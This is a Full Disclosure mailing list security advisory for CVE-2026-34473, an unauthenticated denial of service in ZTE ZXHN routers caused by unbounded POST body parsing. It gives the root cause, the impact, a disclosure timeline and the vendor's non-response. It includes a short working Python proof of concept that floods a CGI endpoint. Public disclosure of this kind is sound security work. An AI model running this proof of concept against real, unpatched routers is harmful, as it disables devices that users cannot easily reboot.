Full Disclosure mailing list archives

[SECURITY ADVISORY] CVE-2026-34473 - Unauthenticated DoS in 17+ ZTE Router Models (140K+ Devices)

---

From: "m.nageh" <minanageh379 () gmail com>
Date: Wed, 20 May 2026 16:31:38 +0200

---

-----BEGIN SECURITY ADVISORY-----

Advisory ID:    MONX-2026-001
CVE ID:         CVE-2026-34473
Title:          Unauthenticated Denial of Service via Oversized POST Body
in ZTE Router CGILua Parser
Affected:       17+ ZTE ZXHN router models (~140,000 publicly exposed
devices)
CVSS Score:     7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Date:           2026-05-20
Author:         Mina Nageh Salalma (Monx Research)
Contact:        minanageh379 () gmail com
Public URL:
https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
MITRE:          https://www.cve.org/CVERecord?id=CVE-2026-34473


AFFECTED PRODUCTS
-----------------
17+ ZTE ZXHN router models sharing the CGILua firmware stack.
Estimated 140,000+ devices publicly reachable on the Internet at time of
research.


VULNERABILITY DESCRIPTION
--------------------------
The CGILua post.lua parser used in ZTE ZXHN routers does not enforce an
upper
bound on the body size of application/x-www-form-urlencoded POST requests.
An unauthenticated attacker can crash or freeze the router's web management
service by sending a single HTTP POST request with an oversized body to any
CGI endpoint. No authentication, session cookie, or prior access is
required.


ROOT CAUSE
----------
Firmware analysis of extracted squashfs images confirms that post.lua reads
the entire POST body into memory before parsing. There is no Content-Length
check or body-size limiter before the allocation occurs. Oversized payloads
cause the LuCI/CGILua process to exhaust memory or fault, taking down the
web management interface until the device is power-cycled.


PROOF OF CONCEPT
----------------
  import requests
  url = "http://TARGET_IP/cgi-bin/luci";
  payload = "a=" + "A" * (256 * 1024)  # 256 KB
  headers = {"Content-Type": "application/x-www-form-urlencoded"}
  try:
      r = requests.post(url, data=payload, headers=headers, timeout=15)
      print(f"HTTP {r.status_code}")
  except requests.exceptions.Timeout:
      print("Timeout - DoS successful")
  except requests.exceptions.ConnectionError:
      print("Connection dropped - DoS successful")


IMPACT
------
An unauthenticated attacker on the LAN or WAN (if management interface is
publicly exposed, as is the case for ~140,000 devices) can permanently
disable remote management access, forcing a physical reboot to restore
access.
ISP-deployed devices with no physical access for end users are especially
vulnerable.


TIMELINE
--------
2024-05:   Local validation on hardware. Firmware extraction and root-cause
confirmed.
2024-05:   Report sent to ZTE PSIRT.
2025-01:   Escalated to MITRE after ZTE failed to respond.
2026-03:   MITRE assigned CVE-2026-34473.
2026-05-20: Full public disclosure.


VENDOR RESPONSE
---------------
ZTE PSIRT did not respond to the initial report. MITRE assigned the CVE
directly. No patch has been issued.


CREDITS
-------
Mina Nageh Salalma (Monx Research)
https://github.com/minanagehsalalma

-----END SECURITY ADVISORY-----
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

---

Current thread:

• [SECURITY ADVISORY] CVE-2026-34473 - Unauthenticated DoS in 17+ ZTE Router Models (140K+ Devices) m.nageh (May 25)